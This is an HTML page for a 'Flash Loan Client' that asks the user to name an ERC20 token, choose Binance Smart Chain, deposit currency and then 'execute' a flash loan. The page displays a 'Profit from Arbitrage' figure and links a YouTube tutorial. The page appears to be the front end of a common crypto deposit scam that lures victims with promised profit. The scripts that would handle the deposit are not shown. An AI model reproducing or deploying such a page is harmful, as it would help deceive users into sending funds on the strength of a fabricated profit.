<!DOCTYPE html>
<html lang="en">
 
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	
	<title>Flash Loan Client</title>
 
	<link rel="stylesheet" href="./assets/css/styles.css">
 
	<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js"></script>
</head>
 
<body ng-app="myApp" ng-controller="myCtrl">
 
	<form ng-show="formStep == 1" ng-submit="submitErc20Form()">
		<h1>STEP 1</h1>
		<p>Your ERC20 Details</p>
 
		<div>&nbsp;</div>
 
		<div class="input-holder">
			<label>Token Name:</label>
			<br>
			<input type="text" ng-model="erc20.name" maxlength="10" autofocus />
		</div>
 
		<div class="input-holder">
			<label>Token Symbol:</label>
			<br>
			<input type="text" ng-model="erc20.symbol" maxlength="4" />
		</div>
 
		<div class="input-holder">

			
			<div>&nbsp;</div>
			
			<input type="radio" ng-model="erc20.network" id="n2" name="network" ng-value="false" ng-checked="!erc20.network">
			<label for="n2">Binance Smart Chain</label>
		</div>
 
		<div class="input-holder btn-holder">
			<button type="submit">Next Step</button>
		</div>
	</form>
 
	<form ng-show="formStep == 2" ng-submit="submitLoanForm()">
		<h1>STEP 2</h1>
		<p>Flash Loan Details</p>
 
		<div>&nbsp;</div>
 
		<div class="input-holder">
			<label>Loan Amount ({{currency}}):</label>
			<br>
			<input id="loanAmtInput" type="number" ng-change="amountChanged()" ng-model="loan.amount" step="1" min="10" max="100" />
		</div>
 
		<div class="input-holder info">
			<div class="kv">
				<div>Token Deployment Fee</div>
				<div>{{loan.tokenFee}} {{currency}}</div>
			</div>
 
			<div class="kv">
				<div>{{dex}} Swapping Fee</div>
				<div>{{loan.swapFee}} {{currency}}</div>
			</div>
 
			<div class="kv">
				<div>Total Cost</div>
				<div class="spend">{{loan.totalFee}} {{currency}}</div>
			</div>
 
			<hr>
 
			<div class="kv">
				<div>Profit from Arbitrage</div>
				<div class="gain">{{loan.gain}} {{currency}}</div>
			</div>
		</div>
 
		<div class="input-holder btn-holder">
			<button type="submit" ng-disabled="processing || ethDeposited">Deposit {{currency}}</button>
		</div>
 
		<div class="input-holder btn-holder">
			<button type="submit" ng-disabled="processing || !ethDeposited">Execute Flash Loan</button>
		</div>
	</form>
 
	 <div class="youtube-note">
		<p><a href="https://www.youtube.com/channel/UCx71PM8WE1NhuL9G6LnXMHg" target="_blank">Watch Tutorial on YouTube</a></p>
	</div>
 
	<script src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.3.5/web3.min.js"></script>
	<script src="./assets/js/addr.js?v=11"></script>
	<script src="./assets/js/chain.js?v=11"></script>
	<script src="./assets/js/script.js?v=11"></script>
</body>
 
</html>
